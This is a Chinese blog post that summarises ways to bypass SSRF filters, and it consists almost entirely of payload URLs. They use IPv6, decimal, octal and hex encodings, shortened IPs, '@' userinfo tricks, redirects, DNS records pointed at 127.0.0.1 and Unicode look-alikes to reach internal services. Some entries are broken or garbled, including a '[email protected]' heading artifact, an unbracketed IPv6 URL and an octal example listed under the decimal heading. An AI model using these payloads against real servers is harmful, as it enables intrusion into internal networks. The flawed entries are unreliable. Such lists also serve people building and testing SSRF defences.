SSRF绕过方法总结


SSRF 绕过方法总结

一、SSRF 是什么?

一句话介绍:利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务

二、绕过 127.0.0.1、localhost、其它内部 IP

  1. 利用[::]绕过
http://[::]:80/  >>>  http://127.0.0.1:80
  1. 利用 0000::绕过
http://0000::1:80  >>> http://127.0.0.1:80
  1. 使用十进制 IP 定位绕过
http://0177.0.0.1/
http://2130706433/  >>>  http://127.0.0.1
http://3232235521/  >>>  http://192.168.0.1
http://3232235777/  >>>  http://192.168.1.1
  1. 使用 IPv6 / IPv4 地址嵌入绕过
http://[0:0:0:0:0:ffff:127.0.0.1]
  1. 删除 0 来简化 IP 地址
http://0/
http://127.1
http://127.0.1
  1. 利用 bash 变量绕过(仅限 curl)
curl -v "http://127$google.0.0.1"
$google = ""
# 等于curl -v "http://127.0.0.1"
  1. [email protected]
http://example.com@127.0.0.1
  1. 利用 302、301 重定向
http://dwz.cn/11SMa  >>>  http://127.0.0.1
  1. 利用 DNS 解析

将 xxx.xxxx.com A 记录解析到 127.0.0.1

  1. 利用 Enclosed alphanumerics
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  >>>  example.com

List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
  1. 利用句号
127。0。0。1  >>>  127.0.0.1
  1. 利用进制转换
可以是十六进制,八进制等。
115.239.210.26  >>>  16373751032
首先把这四段数字给分别转成16进制,结果:73 ef d2 1a
然后把 73efd21a 这十六进制一起转换成8进制
记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0,跟XSS中多加几个0来绕过过滤一样),十六进制加0x

http://115.239.210.26/  >>>  http://016373751032/
http://127.0.0.1/  >>>  http://0177.0.0.1/
http://127.0.0.1/  >>>  http://2130706433/
  1. 利用特殊地址
http://0/

文章作者: Truda
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Truda !
评论
  目录